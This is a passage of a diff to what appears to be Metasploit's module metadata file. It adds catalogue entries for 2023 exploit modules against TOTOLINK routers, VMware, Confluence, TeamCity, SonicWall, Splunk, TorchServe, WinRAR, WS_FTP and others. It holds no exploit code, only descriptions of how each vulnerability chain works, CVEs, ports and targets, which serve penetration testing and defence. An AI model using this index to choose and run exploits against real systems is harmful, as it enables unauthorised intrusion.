+    "ref_name": "linux/http/solarview_unauth_rce_cve_2023_23333",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_linux/http/sonicwall_cve_2021_20039": {
    "name": "SonicWall SMA 100 Series Authenticated Command Injection",
    "fullname": "exploit/linux/http/sonicwall_cve_2021_20039",
@@ -72464,6 +73667,69 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/totolink_unauth_rce_cve_2023_30013": {
+    "name": "TOTOLINK Wireless Routers unauthenticated remote command execution vulnerability.",
+    "fullname": "exploit/linux/http/totolink_unauth_rce_cve_2023_30013",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-05-05",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y <h00die.gr3y@gmail.com>",
+      "Kazamayc https://github.com/Kazamayc"
+    ],
+    "description": "Multiple TOTOLINK network products contain a command insertion vulnerability in setting/setTracerouteCfg.\n          This vulnerability allows an attacker to execute arbitrary commands through the \"command\" parameter.\n          After exploitation, an attacker will have full access with the same user privileges under\n          which the webserver is running (typically as user `root`, ;-).\n\n          The following TOTOLINK network products and firmware are vulnerable:\n          - Wireless Gigabit Router model X5000R with firmware X5000R_V9.1.0u.6118_B20201102.zip;\n          - Wireless Gigabit Router model A7000R with firmware A7000R_V9.1.0u.6115_B20201022.zip;\n          - Wireless Gigabit Router model A3700R with firmware A3700R_V9.1.2u.6134_B20201202.zip;\n          - Wireless N Router model N200RE V5 with firmware N200RE_V5_V9.3.5u.6095_B20200916.zip;\n          - Wireless N Router model N200RE V5 with firmware N200RE_V5_V9.3.5u.6139_B20201216.zip;\n          - Wireless N Router model N350RT with firmware N350RT_V9.3.5u.6095_B20200916.zip;\n          - Wireless N Router model N350RT with firmware N350RT_V9.3.5u.6139_B20201216.zip;\n          - Wireless Extender model EX1200L with firmware EX1200L_V9.3.5u.6146_B20201023.zip; and\n          - probably more looking at the scale of impacted devices :-(",
+    "references": [
+      "CVE-2023-30013",
+      "URL-https://attackerkb.com/topics/xnX3I3PEgM/cve-2023-30013",
+      "URL-https://github.com/Kazamayc/vuln/tree/main/TOTOLINK/X5000R/2"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, mipsle",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2023-09-20 22:14:48 +0000",
+    "path": "/modules/exploits/linux/http/totolink_unauth_rce_cve_2023_30013.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/totolink_unauth_rce_cve_2023_30013",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/tp_link_ncxxx_bonjour_command_injection": {
    "name": "TP-Link Cloud Cameras NCXXX Bonjour Command Injection",
    "fullname": "exploit/linux/http/tp_link_ncxxx_bonjour_command_injection",
@@ -73605,6 +74871,72 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_linux/http/vmware_vrli_rce": {
+    "name": "VMware vRealize Log Insight Unauthenticated RCE",
+    "fullname": "exploit/linux/http/vmware_vrli_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-01-24",
+    "type": "exploit",
+    "author": [
+      "Horizon3.ai Attack Team",
+      "Ege BALCI <egebalci@pm.me>"
+    ],
+    "description": "VMware vRealize Log Insights versions v8.x contains multiple vulnerabilities, such as\n          directory traversal, broken access control, deserialization, and information disclosure.\n          When chained together, these vulnerabilities allow a remote, unauthenticated attacker to\n          execute arbitrary commands on the underlying operating system as the root user.\n\n          This module achieves code execution via triggering a `RemotePakDownloadCommand` command\n          via the exposed thrift service after obtaining the node token by calling a `GetConfigRequest`\n          thrift command. After the download, it will trigger a `PakUpgradeCommand` for processing the\n          specially crafted PAK archive, which then will place the JSP payload under a certain API\n          endpoint (pre-authenticated) location upon extraction for gaining remote code execution.\n\n          Successfully tested against version 8.0.2.",
+    "references": [
+      "ZDI-23-116",
+      "ZDI-23-115",
+      "CVE-2022-31706",
+      "CVE-2022-31704",
+      "CVE-2022-31711",
+      "URL-https://www.horizon3.ai/vmware-vrealize-log-insight-vmsa-2023-0001-technical-deep-dive",
+      "URL-https://www.vmware.com/security/advisories/VMSA-2023-0001.html"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "x86, x64",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "VMware vRealize Log Insight < v8.10.2"
+    ],
+    "mod_time": "2023-09-12 10:16:13 +0000",
+    "path": "/modules/exploits/linux/http/vmware_vrli_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/vmware_vrli_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_linux/http/vmware_vrni_rce_cve_2023_20887": {
    "name": "VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE",
    "fullname": "exploit/linux/http/vmware_vrni_rce_cve_2023_20887",
@@ -80896,7 +82228,7 @@
      "Unix Command",
      "Linux Dropper"
    ],
-    "mod_time": "2022-06-23 16:28:10 +0000",
+    "mod_time": "2023-09-12 12:20:34 +0000",
    "path": "/modules/exploits/linux/misc/nimbus_gettopologyhistory_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/misc/nimbus_gettopologyhistory_cmd_exec",
@@ -83151,6 +84483,83 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/ssh/vmware_vrni_known_privkey": {
+    "name": "VMWare Aria Operations for Networks (vRealize Network Insight) SSH Private Key Exposure",
+    "fullname": "exploit/linux/ssh/vmware_vrni_known_privkey",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-08-29",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "SinSinology",
+      "Harsh Jaiswal ( <Harsh Jaiswal (@rootxharsh)>",
+      "Rahul Maini ( <Rahul Maini (@iamnoooob)>"
+    ],
+    "description": "VMWare Aria Operations for Networks (vRealize Network Insight) versions 6.0.0 through 6.10.0\n            do not randomize the SSH keys on virtual machine initialization. Since the key is easily\n            retrievable, an attacker can use it to gain unauthorized remote access as the \"support\" (root) user.",
+    "references": [
+      "CVE-2023-34039",
+      "URL-https://github.com/sinsinology/CVE-2023-34039",
+      "URL-https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/",
+      "URL-https://www.vmware.com/security/advisories/VMSA-2023-0018.html"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": 22,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "6.0_platform",
+      "6.0_proxy",
+      "6.1_platform",
+      "6.1_proxy",
+      "6.2_collector",
+      "6.2_platform",
+      "6.3_collector",
+      "6.3_platform",
+      "6.4_collector",
+      "6.4_platform",
+      "6.5_collector",
+      "6.5_platform",
+      "6.6_collector",
+      "6.6_platform",
+      "6.7_collector",
+      "6.7_platform",
+      "6.8_collector",
+      "6.8_platform",
+      "6.9_collector",
+      "6.9_platform",
+      "6.10_collector",
+      "6.10_platform",
+      "All"
+    ],
+    "mod_time": "2023-10-23 06:54:38 +0000",
+    "path": "/modules/exploits/linux/ssh/vmware_vrni_known_privkey.rb",
+    "is_install_path": true,
+    "ref_name": "linux/ssh/vmware_vrni_known_privkey",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/ssh/vyos_restricted_shell_privesc": {
    "name": "VyOS restricted-shell Escape and Privilege Escalation",
    "fullname": "exploit/linux/ssh/vyos_restricted_shell_privesc",
@@ -87611,7 +89020,7 @@
      "Unix (In-Memory)",
      "Windows (In-Memory)"
    ],
-    "mod_time": "2023-07-31 16:14:57 +0000",
+    "mod_time": "2023-08-28 17:39:02 +0000",
    "path": "/modules/exploits/multi/http/apache_nifi_processor_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/apache_nifi_processor_rce",
@@ -87628,6 +89037,9 @@
      "SideEffects": [
        "ioc-in-logs",
        "config-changes"
+      ],
+      "NOCVE": [
+        "abusing a feature"
      ]
    },
    "session_types": false,
@@ -87927,6 +89339,66 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/atlassian_confluence_rce_cve_2023_22515": {
+    "name": "Atlassian Confluence Unauthenticated Remote Code Execution",
+    "fullname": "exploit/multi/http/atlassian_confluence_rce_cve_2023_22515",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-10-04",
+    "type": "exploit",
+    "author": [
+      "sfewer-r7"
+    ],
+    "description": "This module exploits an improper input validation issue in Atlassian Confluence, allowing arbitrary HTTP\n          parameters to be translated into getter/setter sequences via the XWorks2 middleware and in turn allows for\n          Java objects to be modified at run time. The exploit will create a new administrator user and upload a\n          malicious plugins to get arbitrary code execution. All versions of Confluence between 8.0.0 through to 8.3.2,\n          8.4.0 through to 8.4.2, and 8.5.0 through to 8.5.1 are affected.",
+    "references": [
+      "CVE-2023-22515",
+      "URL-https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis",
+      "URL-https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 8090,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2023-10-18 09:53:46 +0000",
+    "path": "/modules/exploits/multi/http/atlassian_confluence_rce_cve_2023_22515.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/atlassian_confluence_rce_cve_2023_22515",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/atlassian_confluence_webwork_ognl_injection": {
    "name": "Atlassian Confluence WebWork OGNL Injection",
    "fullname": "exploit/multi/http/atlassian_confluence_webwork_ognl_injection",
@@ -91929,6 +93401,67 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/jetbrains_teamcity_rce_cve_2023_42793": {
+    "name": "JetBrains TeamCity Unauthenticated Remote Code Execution",
+    "fullname": "exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-09-19",
+    "type": "exploit",
+    "author": [
+      "sfewer-r7"
+    ],
+    "description": "This module exploits an authentication bypass vulnerability to achieve unauthenticated remote code execution\n          against a vulnerable JetBrains TeamCity server. All versions of TeamCity prior to version 2023.05.4 are\n          vulnerable to this issue. The vulnerability was originally discovered by SonarSource.",
+    "references": [
+      "CVE-2023-42793",
+      "URL-https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793/rapid7-analysis",
+      "URL-https://blog.jetbrains.com/teamcity/2023/09/critical-security-issue-affecting-teamcity-on-premises-update-to-2023-05-4-now/"
+    ],
+    "platform": "Linux,Windows",
+    "arch": "cmd",
+    "rport": 8111,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows",
+      "Linux"
+    ],
+    "mod_time": "2023-09-28 13:13:12 +0000",
+    "path": "/modules/exploits/multi/http/jetbrains_teamcity_rce_cve_2023_42793.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/jetbrains_teamcity_rce_cve_2023_42793",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/jira_hipchat_template": {
    "name": "Atlassian HipChat for Jira Plugin Velocity Template Injection",
    "fullname": "exploit/multi/http/jira_hipchat_template",
@@ -98118,6 +99651,71 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_multi/http/sonicwall_shell_injection_cve_2023_34124": {
+    "name": "Sonicwall",
+    "fullname": "exploit/multi/http/sonicwall_shell_injection_cve_2023_34124",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-07-12",
+    "type": "exploit",
+    "author": [
+      "fulmetalpackets <fulmetalpackets@gmail.com>",
+      "Ron Bowes <rbowes@rapid7.com>"
+    ],
+    "description": "This module exploits a series of vulnerabilities - including auth\n          bypass, SQL injection, and shell injection - to obtain remote code\n          execution on SonicWall GMS versions <= 9.9.9320.",
+    "references": [
+      "URL-https://www.rapid7.com/blog/post/2023/07/13/etr-sonicwall-recommends-urgent-patching-for-gms-and-analytics-cves/",
+      "CVE-2023-34124",
+      "CVE-2023-34133",
+      "CVE-2023-34132",
+      "CVE-2023-34127"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": "443",
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux Dropper",
+      "Windows Command",
+      "Linux Command"
+    ],
+    "mod_time": "2023-09-06 14:11:29 +0000",
+    "path": "/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/sonicwall_shell_injection_cve_2023_34124",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/splunk_mappy_exec": {
    "name": "Splunk Search Remote Code Execution",
    "fullname": "exploit/multi/http/splunk_mappy_exec",
@@ -98172,6 +99770,70 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/splunk_privilege_escalation_cve_2023_32707": {
+    "name": "Splunk \"edit_user\" Capability Privilege Escalation",
+    "fullname": "exploit/multi/http/splunk_privilege_escalation_cve_2023_32707",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-06-01",
+    "type": "exploit",
+    "author": [
+      "Mr Hack (try_to_hack) Santiago Lopez",
+      "Heyder Andrade",
+      "Redway Security <redwaysecurity.com>"
+    ],
+    "description": "A low-privileged user who holds a role that has the \"edit_user\" capability assigned to it\n          can escalate their privileges to that of the admin user by providing a specially crafted web request.\n          This is because the \"edit_user\" capability does not honor the \"grantableRoles\" setting in the authorize.conf\n          configuration file, which prevents this scenario from happening.\n\n          This exploit abuses this vulnerability to change the admin password and login with it to upload a malicious app achieving RCE.",
+    "references": [
+      "CVE-2023-32707",
+      "URL-https://advisory.splunk.com/advisories/SVD-2023-0602",
+      "URL-https://blog.redwaysecurity.com/2023/09/exploit-cve-2023-32707.html",
+      "URL-https://github.com/redwaysecurity/CVEs/tree/main/CVE-2023-32707"
+    ],
+    "platform": "Linux,OSX,Unix,Windows",
+    "arch": "",
+    "rport": 8000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Splunk < 9.0.5, 8.2.11, and 8.1.14 / Linux",
+      "Splunk < 9.0.5, 8.2.11, and 8.1.14 / Windows"
+    ],
+    "mod_time": "2023-10-26 14:03:06 +0000",
+    "path": "/modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/splunk_privilege_escalation_cve_2023_32707",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/splunk_upload_app_exec": {
    "name": "Splunk Custom App Remote Code Execution",
    "fullname": "exploit/multi/http/splunk_upload_app_exec",
@@ -99891,6 +101553,74 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/torchserver_cve_2023_43654": {
+    "name": "PyTorch Model Server Registration and Deserialization RCE",
+    "fullname": "exploit/multi/http/torchserver_cve_2023_43654",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-10-03",
+    "type": "exploit",
+    "author": [
+      "Idan Levcovich",
+      "Guy Kaplan",
+      "Gal Elbaz",
+      "Swapneil Kumar Dash",
+      "Spencer McIntyre"
+    ],
+    "description": "The PyTorch model server contains multiple vulnerabilities that can be chained together to permit an\n        unauthenticated remote attacker arbitrary Java code execution. The first vulnerability is that the management\n        interface is bound to all IP addresses and not just the loop back interface as the documentation suggests. The\n        second vulnerability (CVE-2023-43654) allows attackers with access to the management interface to register MAR\n        model files from arbitrary servers. The third vulnerability is that when an MAR file is loaded, it can contain a\n        YAML configuration file that when deserialized by snakeyaml, can lead to loading an arbitrary Java class.",
+    "references": [
+      "URL-https://www.oligo.security/blog/shelltorch-torchserve-ssrf-vulnerability-cve-2023-43654",
+      "CVE-2023-43654",
+      "URL-https://github.com/pytorch/serve/security/advisories/GHSA-8fxr-qfr9-p34w",
+      "CVE-2022-1471",
+      "URL-https://github.com/google/security-research/security/advisories/GHSA-mjmj-j48q-9wg2",
+      "URL-https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in",
+      "URL-https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 8081,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2023-10-11 16:56:20 +0000",
+    "path": "/modules/exploits/multi/http/torchserver_cve_2023_43654.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/torchserver_cve_2023_43654",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/totaljs_cms_widget_exec": {
    "name": "Total.js CMS 12 Widget JavaScript Code Injection",
    "fullname": "exploit/multi/http/totaljs_cms_widget_exec",
@@ -142034,6 +143764,58 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/fileformat/winrar_cve_2023_38831": {
+    "name": "WinRAR CVE-2023-38831 Exploit",
+    "fullname": "exploit/windows/fileformat/winrar_cve_2023_38831",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-08-23",
+    "type": "exploit",
+    "author": [
+      "Alexander \"xaitax\" Hagenah"
+    ],
+    "description": "This module exploits a vulnerability in WinRAR (CVE-2023-38831). When a user opens a crafted RAR file and its\n          embedded document, the decoy document is executed, leading to code execution.",
+    "references": [
+      "CVE-2023-38831",
+      "URL-https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/",
+      "URL-https://b1tg.github.io/post/cve-2023-38831-winrar-analysis/"
+    ],
+    "platform": "Windows",
+    "arch": "x64, x86",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows"
+    ],
+    "mod_time": "2023-09-07 22:01:49 +0000",
+    "path": "/modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb",
+    "is_install_path": true,
+    "ref_name": "windows/fileformat/winrar_cve_2023_38831",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/fileformat/winrar_name_spoofing": {
    "name": "WinRAR Filename Spoofing",
    "fullname": "exploit/windows/fileformat/winrar_name_spoofing",
@@ -151953,6 +153735,66 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_windows/http/lg_simple_editor_rce": {
+    "name": "LG Simple Editor Remote Code Execution",
+    "fullname": "exploit/windows/http/lg_simple_editor_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-08-24",
+    "type": "exploit",
+    "author": [
+      "rgod",
+      "Ege Balcı <egebalci@pm.me>"
+    ],
+    "description": "This Metasploit module exploits broken access control and directory traversal\n          vulnerabilities in LG Simple Editor software for gaining code execution.\n          The vulnerabilities exist in versions of LG Simple Editor prior to v3.21.\n          By exploiting this flaw, an attacker can upload and execute a malicious JSP\n          payload with the SYSTEM user permissions.",
+    "references": [
+      "ZDI-23-1204",
+      "CVE-2023-40498"
+    ],
+    "platform": "Windows",
+    "arch": "x86, x64",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "LG Simple Editor <= v3.21"
+    ],
+    "mod_time": "2023-09-07 17:00:17 +0000",
+    "path": "/modules/exploits/windows/http/lg_simple_editor_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/lg_simple_editor_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_windows/http/mailenable_auth_header": {
    "name": "MailEnable Authorization Header Buffer Overflow",
    "fullname": "exploit/windows/http/mailenable_auth_header",
@@ -153185,17 +155027,23 @@
    "disclosure_date": "2016-02-04",
    "type": "exploit",
    "author": [
+      "Ege BALCI <egebalci@pm.me>",
      "Pedro Ribeiro <pedrib@gmail.com>"
    ],
-    "description": "Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.\n        The application has a file upload vulnerability that can be exploited by an\n        unauthenticated remote attacker to execute code as the SYSTEM user.\n        Two servlets are vulnerable, FileUploadController (located at\n        /lib-1.0/external/flash/fileUpload.do) and FileUpload2Controller (located at /fileUpload.do).\n        This module exploits the latter, and has been tested with versions 1.5.0.2, 1.4.0.17 and\n        1.1.0.13.",
+    "description": "Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.\n          The application has multiple vulnerabilities that can allow an unauthenticated remote\n          attacker to execute code as SYSTEM user. Vulnerabilities include authentication bypass,\n          SQL injection, arbitrary file upload, and privilege escalation across various versions.\n          This module is able to spawn a meterpreter session by chaining together two specific\n          vulnerabilities inside the FileUploadController and MyHandlerInterceptor classes.\n          This module has been tested with versions 1.5.0.2, 1.4.0.17, 1.1.0.13, 1.7.0.12, and 1.7.0.1.",
    "references": [
+      "ZDI-23-920",
+      "ZDI-23-918",
+      "CVE-2023-38096",
+      "CVE-2023-38098",
      "CVE-2016-1525",
      "US-CERT-VU-777024",
      "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt",
-      "URL-https://seclists.org/fulldisclosure/2016/Feb/30"
+      "URL-https://seclists.org/fulldisclosure/2016/Feb/30",
+      "URL-https://kb.netgear.com/000065707/Security-Advisory-for-Multiple-Vulnerabilities-on-the-ProSAFE-Network-Management-System-PSV-2023-0024-PSV-2023-0025"
    ],
    "platform": "Windows",
-    "arch": "x86",
+    "arch": "x86, x64",
    "rport": 8080,
    "autofilter_ports": [
      80,
@@ -153215,7 +155063,7 @@
    "targets": [
      "NETGEAR ProSafe Network Management System 300 / Windows"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-08-02 18:03:57 +0000",
    "path": "/modules/exploits/windows/http/netgear_nms_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/http/netgear_nms_rce",
@@ -153223,6 +155071,16 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
    },
    "session_types": false,
    "needs_cleanup": null
@@ -156512,6 +158370,67 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/http/ws_ftp_rce_cve_2023_40044": {
+    "name": "Progress Software WS_FTP Unauthenticated Remote Code Execution",
+    "fullname": "exploit/windows/http/ws_ftp_rce_cve_2023_40044",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-09-27",
+    "type": "exploit",
+    "author": [
+      "sfewer-r7"
+    ],
+    "description": "This module exploits an unsafe .NET deserialization vulnerability to achieve unauthenticated remote code\n          execution against a vulnerable WS_FTP server running the Ad Hoc Transfer module. All versions of WS_FTP Server\n          prior to 2020.0.4 (version 8.7.4) and 2022.0.2 (version 8.8.2) are vulnerable to this issue. The vulnerability\n          was originally discovered by AssetNote.",
+    "references": [
+      "CVE-2023-40044",
+      "URL-https://attackerkb.com/topics/bn32f9sNax/cve-2023-40044/rapid7-analysis",
+      "URL-https://community.progress.com/s/article/WS-FTP-Server-Critical-Vulnerability-September-2023",
+      "URL-https://www.assetnote.io/resources/research/rce-in-progress-ws-ftp-ad-hoc-via-iis-http-modules-cve-2023-40044"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows"
+    ],
+    "mod_time": "2023-10-04 09:39:25 +0000",
+    "path": "/modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/ws_ftp_rce_cve_2023_40044",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/http/xampp_webdav_upload_php": {
    "name": "XAMPP WebDAV PHP Upload",
    "fullname": "exploit/windows/http/xampp_webdav_upload_php",
@@ -159830,7 +161749,7 @@
      "TheWack0lian",
      "OJ Reeves"
    ],
-    "description": "This module abuses the Capcom.sys kernel driver's function that allows for an\n            arbitrary function to be executed in the kernel from user land. This function\n            purposely disables SMEP prior to invoking a function given by the caller.\n            This has been tested on Windows 7, 8.1 and Windows 10 (x64).",
+    "description": "This module abuses the Capcom.sys kernel driver's function that allows for an\n            arbitrary function to be executed in the kernel from user land. This function\n            purposely disables SMEP prior to invoking a function given by the caller.\n            This has been tested on Windows 7, 8.1, 10 (x64) and Windows 11 (x64) upto build 22000.194.\n            Note that builds after 22000.194 contain deny lists that prevent this driver from loading.",
    "references": [
      "URL-https://twitter.com/TheWack0lian/status/779397840762245124"
    ],
@@ -159844,9 +161763,9 @@

    ],
    "targets": [
-      "Windows x64 (<= 10)"
+      "Windows x64"
    ],
-    "mod_time": "2023-05-25 12:45:30 +0000",
+    "mod_time": "2023-09-08 13:05:44 +0000",
    "path": "/modules/exploits/windows/local/capcom_sys_exec.rb",
    "is_install_path": true,
    "ref_name": "windows/local/capcom_sys_exec",
@@ -160991,6 +162910,60 @@
    ],
    "needs_cleanup": null
  },
+  "exploit_windows/local/cve_2023_28252_clfs_driver": {
+    "name": "Windows Common Log File System Driver (clfs.sys) Elevation of Privilege Vulnerability",
+    "fullname": "exploit/windows/local/cve_2023_28252_clfs_driver",
+    "aliases": [
+
